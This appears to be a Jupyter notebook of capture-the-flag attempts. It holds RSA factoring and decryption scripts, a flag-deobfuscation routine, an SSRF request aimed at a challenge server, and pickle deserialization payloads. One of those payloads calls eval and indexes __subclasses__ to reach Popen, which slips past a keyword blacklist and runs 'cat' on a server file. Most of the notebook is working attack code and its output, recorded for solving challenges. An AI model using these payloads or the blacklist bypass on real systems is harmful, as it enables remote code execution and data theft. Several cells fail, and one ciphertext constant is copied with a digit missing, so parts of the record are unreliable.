In [25]:
# Attempt to recover p from provided RSA leak using a best-effort polynomial search.
# This code implements the algebraic relation derived from:
#   K = F * d, where F = A*p^2 - C*p + D and d is RSA private exponent.
# and
#   e*d - 1 = t*phi  (for some integer t)
# Substituting d = K/F yields a polynomial equation in p and t.
#
# We iterate over a range of small t values and try to find integer roots p that divide n.
# This is a best-effort solver for CTF-style challenges; it may or may not succeed for given parameters.
#
# NOTE: This can be slow for large t ranges. We try a moderate limit by default.
#
# Replace the constants below with the actual values if different.

from sympy import symbols, Poly, resultant, Integer, factorint, sqrt as sym_sqrt
from sympy import nroots
from Crypto.Util.number import long_to_bytes
import math

# --- Provided constants from your earlier message ---
e = 65537
n = 136662138568405759652569485621304832135743269224429076000191336651576798256567957359278546453957784382953354418192811395367857796645157702643652845279396980899228024461423444406424932062611588269628079558885170894328481407656074170613184844511638158871277095257162360211838914457286082614699147445680796038227
ct = 130271648744851557782584170500071792022104939052518963217627541505296014224787211138560303490640497291460182483303482823025319328938688635918862340195273272326812356907521416281992280612685135898549011238446090450277377633778290293177969023137190061209278323106360338751146173507493182990079659239549275916851
K = 11004823678323196452575488769917780370651722871537083360894217054612837661166756758970261641451088154711003404193217952262381599857990268596413661000115679124811136232289911464267858150329782042746762779826561930994131179358899570429619787710549773068393703742259614559797785197115587924065297959454515731852004162693127123795721194664316039006075678888975675103724001543600016980598077669714621266892552662162429810867395241413731007821143316749400189850479761339926843340489141249598197713912268430779336145985663708654655967040461718023520251433442214072034844535697156327108560096923743135491375364608133670292194851637591

# Constants used in GenerateKeys
A = 0xbaadf00d
C = 0xbaaaaaad
D = 0xdeadbeef

# Symbol for p
p = symbols('p', integer=True)

# We'll search over a reasonable range of t values.
# If no success, you can increase t_max (at cost of runtime).
t_max = 5000  # best-effort
found = False

print("Starting search for p (this may take some time)...")
for t in range(1, t_max + 1):
    # Build polynomial from equation:
    # e*K - F = t * phi * F
    # where F = A*p^2 - C*p + D, phi = (p-1)*(n/p - 1) = (p-1)*(n//p - 1) when p divides n
    # We eliminate q by substituting n = p*q, but we need to remove fractions by multiplying by p.
    #
    # Multiply both sides by p to clear the (n/p) term:
    # p*(e*K - F) = t * F * (p-1)*(n - p - 1)
    #
    # Expand both sides and move all to LHS to get polynomial in p.
    F = A*p**2 - C*p + D
    # phi*p = (p-1)*(n - p - 1)  because phi*p = (p-1)*(n - p - 1)
    phi_times_p = (p - 1) * (n - p - 1)
    poly_expr = p*(e*K - F) - t * F * phi_times_p  # equals 0 for correct p and t

    # Convert to integer-coefficient polynomial
    P = Poly(poly_expr, p)
    coeffs = P.all_coeffs()
    # Quickly skip if polynomial degree is too high or coefficients huge (we're in big-int land anyway)
    try:
        # Find numeric roots approx; then check for integer roots
        roots = nroots(P, n=10)
    except Exception:
        continue

    for r in roots:
        # check if root is close to integer
        if abs(r.as_real_imag()[0].as_real_imag()[0] - round(r.as_real_imag()[0].as_real_imag()[0])) < 1e-12 and abs(r.as_real_imag()[1]) < 1e-12:
            cand_p = int(round(r.as_real_imag()[0].as_real_imag()[0]))
            if cand_p > 1 and n % cand_p == 0:
                q = n // cand_p
                phi = (cand_p - 1) * (q - 1)
                d = pow(e, -1, phi)
                # verify K equals (A*p^2 - C*p + D)*d
                F_val = A*cand_p*cand_p - C*cand_p + D
                if F_val * d == K:
                    print(f"Found p = {cand_p}")
                    print(f"Found q = {q}")
                    m = pow(ct, d, n)
                    try:
                        flag = long_to_bytes(m)
                        print("Recovered flag (bytes):", flag)
                    except Exception as exc:
                        print("Recovered m but converting to bytes failed:", m)
                    found = True
                    break
    if found:
        break

if not found:
    print("Search finished up to t_max =", t_max, "and no valid p was found. You can increase t_max to continue the search.")


ModuleNotFoundError: No module named 'sympy'

In [ ]:
!pip install sumpy

In [23]:
# ❗️ Replace "your_file.txt" with the actual path to your file
file_to_read = "newold.txt"
process_file_rows(file_to_read)

Processing file: newold.txt

Row 1: (Count: 45) -> -
Row 2: (Count: 45) -> -
Row 3: (Count: 32) ->  
Row 4: (Count: 45) -> -
Row 5: (Count: 45) -> -
Row 6: (Count: 45) -> -
Row 7: (Count: 32) ->  
Row 8: (Count: 45) -> -
Row 9: (Count: 46) -> .
Row 10: (Count: 32) ->  
Row 11: (Count: 45) -> -
Row 12: (Count: 45) -> -
Row 13: (Count: 46) -> .
Row 14: (Count: 32) ->  
Row 15: (Count: 45) -> -
Row 16: (Count: 45) -> -
Row 17: (Count: 45) -> -
Row 18: (Count: 32) ->  
Row 19: (Count: 46) -> .
Row 20: (Count: 45) -> -
Row 21: (Count: 46) -> .
Row 22: (Count: 46) -> .
Row 23: (Count: 32) ->  
Row 24: (Count: 46) -> .
Row 25: (Count: 45) -> -
Row 26: (Count: 45) -> -
Row 27: (Count: 32) ->  
Row 28: (Count: 46) -> .
Row 29: (Count: 45) -> -
Row 30: (Count: 32) ->  
Row 31: (Count: 46) -> .
Row 32: (Count: 45) -> -
Row 33: (Count: 46) -> .
Row 34: (Count: 32) ->  
Row 35: (Count: 46) -> .
Row 36: (Count: 45) -> -
Row 37: (Count: 46) -> .
Row 38: (Count: 32) ->  
Row 39: (Count: 46) -> .
Row 4

In [26]:
import requests
import json

# Replace with the actual IP address and port of the target server
TARGET_URL = 'http://the-gerege-revenge.challenge.haruulzangi.mn:8009/public'

# The payload tricks the server into requesting an internal endpoint.
# The '@' character is automatically URL-encoded by the `requests` library.
PAYLOAD = {
    'p': '@localhost:8009/gerege/gold?'
}

print(f"[*] Sending malicious payload to: {TARGET_URL}")

try:
    # Send the POST request with the form data
    response = requests.post(TARGET_URL, data=PAYLOAD, timeout=10)

    # Raise an exception for bad status codes (4xx or 5xx)
    response.raise_for_status()

    # Parse and print the JSON response from the server
    json_response = response.json()
    
    print("\n✅ Success! Server response:")
    # Pretty-print the JSON response for better readability
    print(json.dumps(json_response, indent=2))

except requests.exceptions.RequestException as e:
    print(f"\n❌ An error occurred: {e}")

[*] Sending malicious payload to: http://the-gerege-revenge.challenge.haruulzangi.mn:8009/public

❌ An error occurred: HTTPConnectionPool(host='the-gerege-revenge.challenge.haruulzangi.mn', port=8009): Max retries exceeded with url: /public (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x000001DDDB2DD3D0>: Failed to establish a new connection: [WinError 10061] No connection could be made because the target machine actively refused it'))


In [29]:
def ror(byte, count):
    """Performs a right bitwise rotation on an 8-bit byte."""
    count %= 8
    return ((byte >> count) | (byte << (8 - count))) & 0xFF

def solve():
    """
    Reverses the obfuscation process to find the original flag.
    """
    # --- PASTE THE OBFUSCATED DATA HERE ---
    # You would get this data from the challenge itself or by
    # running the binary in a debugger and inspecting memory.
    # For example, let's say the output was this list of integers:
    encrypted_data = [0x7B, 0xBD, 0x70, 0xF6, 0x7C, 0x1B, 0x59, 0x03, 0x79, 0x9C, 0x52, 0xF5, 0xCB, 0x8E, 0x54, 0xE6, 0x84, 0xF7, 0x23, 0x68, 0xE6, 0x08, 0x6A, 0x62, 0x6D, 0x31, 0xD8, 0x1A, 0x10, 0x69, 0xC1, 0x53, 0x21, 0x0E, 0x4E, 0x6F, 0x59, 0x4D, 0x2C, 0x08, 0xE3, 0x7F, 0xFD, 0x6B, 0xC8, 0x06, 0x3E, 0x32, 0x49, 0xD1, 0x20, 0x90]
    
    # Convert integer array to a byte array for easier manipulation
    data = bytearray(encrypted_data)
    length = len(data)
    print(f"[*] Reversing data of length: {length}")

    # --- Step 1: Reconstruct the key_byte from sub_401281 ---
    field_0 = length ^ 305419896
    key_byte = (field_0 & 0xFF) ^ 66
    print(f"[*] Reconstructed key_byte: {key_byte}")

    # --- Step 2: Reverse the three obfuscation stages in reverse order ---
    
    # Reverse Stage 3: Subtract 13
    temp_stage1 = bytearray()
    for char_code in data:
        temp_stage1.append((char_code - 13) & 0xFF)

    # Reverse Stage 2: XOR with the generated key
    temp_stage2 = bytearray()
    for i, char_code in enumerate(temp_stage1):
        xor_key = (i * 7) ^ key_byte
        temp_stage2.append((char_code ^ xor_key) & 0xFF)

    # Reverse Stage 1: Rotate Right (ROR)
    flag = bytearray()
    for i, char_code in enumerate(temp_stage2):
        shift_amount = (i % 3) + 1
        flag.append(ror(char_code, shift_amount))
        
    print("\n[+] Found the flag! 🎉")
    print(f"FLAG: {flag.decode('utf-8')}")


if __name__ == '__main__':
    solve()

[*] Reversing data of length: 52
[*] Reconstructed key_byte: 14

[+] Found the flag! 🎉
FLAG: 0nly_d4rK_Cur5e_Br34k3r_can_r34d_th3_Scr0ll_0f_L1ght


In [24]:
TARGET_URL = 'http://the-gerege.challenge.haruulzangi.mn:8008/public'

# Payload for a legitimate image file.
# We assume a file like 'logo.png' might exist in the /public/ directory.
# PAYLOAD = {
#     'p': '/public/golden-gerege.png' 
# }


# Send the POST request with the form data
response = requests.post(TARGET_URL, timeout=10)
response.raise_for_status() # Check for HTTP errors

HTTPError: 400 Client Error: BAD REQUEST for url: http://the-gerege.challenge.haruulzangi.mn:8008/public

In [36]:
import gmpy2
from Crypto.Util.number import long_to_bytes
import sys

# The two hex strings from the challenge file.
# The larger one is the modulus n, the smaller is the ciphertext c.
hex_1 = 'a9b8ac82034aca5e36d082411b6d02fb9ae2abd2c6a0761e601ce6686ccd221695516e7a8b548885a92c97ccb2297bebdd5cafb42e5ca105593fae843b9f298f0a9939f4d90ce6ed903bb68948c3f479fdf47f4dfb6b07ff11fd09becc32ebaa15da0b4753b0569c0c6a35d852944db30273b374afbf0d75483aa191b5135e661d183fefd2b550af6debb2da54f33e48bcefebbefc6be55d02b0e0859a81b0904fffb41472257185add81e141580e78eba0074a69e3048607d444711399ab62da163191fd57bc560355f81f67a7cee281e08b36bea19a6ab7cf79930aee63c2672d461971720271dbcf3c8fda2a7fc9431787948e3527d568307762abbc7b951'
hex_2 = '2023ef922965d23c5b75389a6307ba372883be7f5718d4e2401b21fd6e476e17ed7d1f773f95f2909a9f80ef7d1e7b325f647706d380d2196d24be6990e05b14bf97549269f6a709aba7fb71538b3a5ccb51ec526c16835d2b02e670b1ec9856e216b2b2cf52bc136c74ccafd994c0282efe5f2bc4dbca7b3323724190284410bab5f0e726eb226b79a675491a560fb6d4bb36cc051e524f6215ac52dadd7d97d0f7671c333d5665b148380165017b03c67bc9046d699097462614f7470afa3aeffada1ffb356d13261fcc0b9ee36a4bf9fedfe006413516dd1c0db53c7d35818fa334104df77fc390b6e9a6985c7c47f45c2245fd78c22ecc593bb02a3d5e03'

# --- Helper function to generate primes ---
def primes_sieve(limit):
    """Generates primes up to a given limit using a sieve."""
    primes = []
    is_prime = [True] * (limit + 1)
    is_prime[0] = is_prime[1] = False
    for p in range(2, limit + 1):
        if is_prime[p]:
            primes.append(p)
            for i in range(p * p, limit + 1, p):
                is_prime[i] = False
    return primes

# --- Pollard's p-1 Algorithm ---
def pollards_p_minus_1(n, B):
    """
    Attempts to factor n using Pollard's p-1 algorithm with smoothness bound B.
    """
    print(f"[*] Starting Pollard's p-1 factorization with bound B = {B}...")
    a = gmpy2.mpz(2)
    
    print("[*] Generating primes up to the bound...")
    sys.stdout.flush()
    prime_list = primes_sieve(B)
    print(f"[*] Found {len(prime_list)} primes.")
    
    print("[*] Stage 1: Computing exponentiation...")
    sys.stdout.flush()
    # Compute a^M mod n, where M = lcm(1, 2, ..., B)
    for p in prime_list:
        p_power = gmpy2.mpz(p)
        while p_power * p <= B:
            p_power *= p
        a = gmpy2.powmod(a, p_power, n)
    
    print("[*] Stage 1 finished. Calculating GCD...")
    sys.stdout.flush()
    g = gmpy2.gcd(a - 1, n)
    return g

# --- Main Decryption Logic ---
try:
    val1 = int(hex_1, 16)
    val2 = int(hex_2, 16)

    # n is the larger value, c is the smaller
    if val1 > val2:
        n, c = val1, val2
    else:
        n, c = val2, val1
        
    e = 0x10001

    # The script uses factors up to ~17 bits. A bound of 2^18 is safe.
    smoothness_bound = 2**18 
    
    p = pollards_p_minus_1(n, smoothness_bound)
    
    if 1 < p < n:
        print(f"✅ Success! Found a factor: p = {p}")
        q = n // p
        
        # Sanity check
        assert p * q == n
        print(f"✅ Found second factor: q = {q}")

        # Standard RSA decryption
        phi = (p - 1) * (q - 1)
        d = gmpy2.invert(e, phi)
        m = pow(c, d, n)
        
        # Decode the flag
        flag = long_to_bytes(m).decode()

        print("\n🎉 The flag is:")
        print(flag)
    elif p == n:
        print("❌ Factoring failed. p-1 and q-1 were both B-smooth. Try a smaller bound B.")
    else: # p == 1
        print("❌ Factoring failed. No factor found. Try a larger bound B or Stage 2.")

except Exception as e:
    print(f"An error occurred: {e}")

[*] Starting Pollard's p-1 factorization with bound B = 262144...
[*] Generating primes up to the bound...


[*] Found 23000 primes.
[*] Stage 1: Computing exponentiation...
[*] Stage 1 finished. Calculating GCD...
❌ Factoring failed. p-1 and q-1 were both B-smooth. Try a smaller bound B.


In [37]:
import pickle, base64

class FindFlag:
    def __reduce__(self):
        glob_module = __import__('glob')
        # Look for common flag names
        # You can try multiple patterns: 'flag*', '*flag*', '*secret*'
        return (getattr(glob_module, 'glob'), ('**/**',))

payload = pickle.dumps(FindFlag())
b64_payload = base64.b64encode(payload).decode()
print(b64_payload)

gASVGAAAAAAAAACMBGdsb2KUaACTlIwFKiovKiqUhZRSlC4=


In [51]:
import pickle
import base64
import subprocess

class UltimateExploit:
    def __reduce__(self):
        # This command string accesses subprocess.Popen by its index (499)
        # to avoid using the blacklisted word 'subprocess'.
        # stdout=-1 is used as a numeric alias for subprocess.PIPE.
        command = (
            "().__class__.__base__.__subclasses__()[499]("
            "['cat', 'templates/result.html'], stdout=-1)"
            ".communicate()[0]"
        )
        
        # The payload tells pickle to execute: eval(command)
        return (eval, (command,))

# 1. Create the payload object
payload_object = UltimateExploit()

# 2. Serialize and encode it
pickled_bytes = pickle.dumps(payload_object)
b64_payload = base64.b64encode(pickled_bytes).decode()

print("## Ultimate Bypassing Payload ##\n")
print("This payload uses the index of Popen to bypass the filter.")
print("---------------------------------------------------------")
print(b64_payload)

## Ultimate Bypassing Payload ##

This payload uses the index of Popen to bypass the filter.
---------------------------------------------------------
gASVhQAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIxpKCkuX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKClbNDk5XShbJ2NhdCcsICd0ZW1wbGF0ZXMvcmVzdWx0Lmh0bWwnXSwgc3Rkb3V0PS0xKS5jb21tdW5pY2F0ZSgpWzBdlIWUUpQu


In [53]:
import gmpy2
import binascii

# --- KNOWN VALUES ---
# These are the correct values you found by factoring n.
p = 120960528675710061928254314737660830599948199307323027521384388483515935182856677281982487002801188121795879496870174101644087304286236119718236423338043636467910548291918300792649957781589288240533385855610898730724105880886888868781848032348820449836913501625990114724889080603103085316191618945116586212259
q = 177126702798867417258820796482942600465409871960795199155534170219323258685150612224220329767993836971678946720505931107129622286150101613589105628306268865160056658688837004381035808884340787702501375417715695270262070101684341968458891400158648302954200841353707982041088679435589539443674505480292300392059

# The original n and c from the challenge.
n_hex = 'a9b8ac82034aca5e36d082411b6d02fb9ae2abd2c6a0761e601ce6686ccd221695516e7a8b548885a92c97ccb2297bebdd5cafb42e5ca105593fae843b9f298f0a9939f4d90ce6ed903bb68948c3f479fdf47f4dfb6b07ff11fd09becc32ebaa15da0b4753b0569c0c6a35d852944db30273b374afbf0d75483aa191b5135e661d183fefd2b550af6debb2da54f33e48bcefebbefc6be55d02b0e0859a81b0904fffb41472257185add81e141580e78eba0074a69e3048607d444711399ab62da163191fd57bc560355f81f67a7cee281e08b36bea19a6ab7cf79930aee63c2672d461971720271dbcf3c8fda2a7fc9431787948e3527d568307762abbc7b951'
c_hex = '2023ef922965d23c5b75389a6307ba372883be7f5718d4e2401b21fd6e476e17ed7d1f773f95f2909a9f80ef7d1e7b325f647706d380d2196d24be6990e05b14bf97549269f6a709aba7fb71538b3a5ccb51ec526c16835d2b02e670b1ec9856e216b2b2cf52bc136c74ccafd994c0282efe5f2bc4dbca7b3323724190284410bab5f0e726eb226b79a675491a560fb6d4bb36cc051e524f6215ac52dadd7d97d0f7671c333d5665b148380165017b0367bc9046d699097462614f7470afa3aeffada1ffb356d13261fcc0b9ee36a4bf9fedfe006413516dd1c0db53c7d35818fa334104df77fc390b6e9a6985c7c47f45c2245fd78c22ecc593bb02a3d5e03'

n = int(n_hex, 16)
c = int(c_hex, 16)
e = 0x10001

# --- 1. DECRYPTION ---
# This part is mathematically correct and reverses the encryption.
# We use lcm(p-1, q-1) to perfectly match the original script.
print("[*] Performing RSA decryption...")
lambda_n = gmpy2.lcm(p - 1, q - 1)
d = gmpy2.invert(e, lambda_n)
m = pow(c, d, n)
print(f"[*] Decrypted message 'm' as an integer:\n{m}\n")

# --- 2. DECODING ANALYSIS ---
# The integer 'm' is correct. The problem is converting it back to a flag.
# We will now try to reverse the encoding process: bytes -> hexlify -> int

# The reverse is: int -> hex -> unhexlify -> bytes
print("[*] Converting 'm' from an integer back to bytes...")
try:
    # Convert integer to its hex string representation (e.g., 1000 -> '3e8')
    m_hex = hex(m)[2:]
    # Un-hexlify the string to get the raw bytes (e.g., '3e8' -> b'\x03\xe8')
    m_bytes = binascii.unhexlify(m_hex)
    print(f"[*] Decrypted raw bytes:\n{m_bytes}\n")
except Exception as e:
    print(f"Error during int -> bytes conversion: {e}")
    # Fallback for completeness, though the above should work.
    m_bytes = m.to_bytes((m.bit_length() + 7) // 8, 'big')

# --- 3. FLAG INTERPRETATION ---
# Now we try to interpret these raw bytes as the flag.

# Method 1: Direct decoding (assumes flag.txt contained the flag directly)
print("--- Attempt 1: Direct Decoding ---")
try:
    flag = m_bytes.decode('utf-8')
    print("✅ Success! The flag is:")
    print(flag)
except UnicodeDecodeError as e:
    print(f"❌ Failed to decode as UTF-8: {e}")
    print("Displaying with 'latin-1' to see raw content:")
    print(m_bytes.decode('latin-1'))
    print("-" * 20)

# Method 2: Double-Hex decoding (assumes flag.txt contained a hex string)
print("\n--- Attempt 2: Double-Hex Decoding ---")
try:
    # First, decode the bytes into what should be a hex string
    hex_string_from_file = m_bytes.decode('utf-8')
    # Then, un-hexlify that string to get the final flag
    final_bytes = binascii.unhexlify(hex_string_from_file)
    flag = final_bytes.decode('utf-8')
    print("✅ Success! The flag is:")
    print(flag)
except Exception as e:
    print(f"❌ Failed to decode using the double-hex method: {e}")
    print("-" * 20)

[*] Performing RSA decryption...
[*] Decrypted message 'm' as an integer:
15772082380249455248441718459366964287928617020136226273208090932243452560800023386029709882459639707526390759107219144286400165504310679029502373123454687324844164314570755254891520051557564152756094625514293219227066790868767759285543474750237951117695435820899651920873327664602469781091728823144662025979659486427169457545694538675343727496903157140416507299711008548051959467966304482333900055850781309419117168590599960124602086388348055423928270343128485028394956703313213946879469240278675113180636410022621055267373403592101418468149177545375592347341389351269382497975343973300615995839685878271746543312981

[*] Converting 'm' from an integer back to bytes...
[*] Decrypted raw bytes:
b'|\xf0_\x9a8\x13O$\xa8\x08\xf6_N\xb4\xcd\xd6\xf7\x9a\xb2\x08\xd1\xa0k\xc7S\x89\xe0\xd22\xe8E5 \x0b9\xb1\xe1\x7f\x9bE\xea.DVQX\x84\xa3\x0c\x03\x98\xf9-\xa8\x10\xec\xc5\xf3[C=\x10\xad\xd1\x98u\xf7\xca\xc0\xc2\xbe\x07\xc4o/"\xec\x8b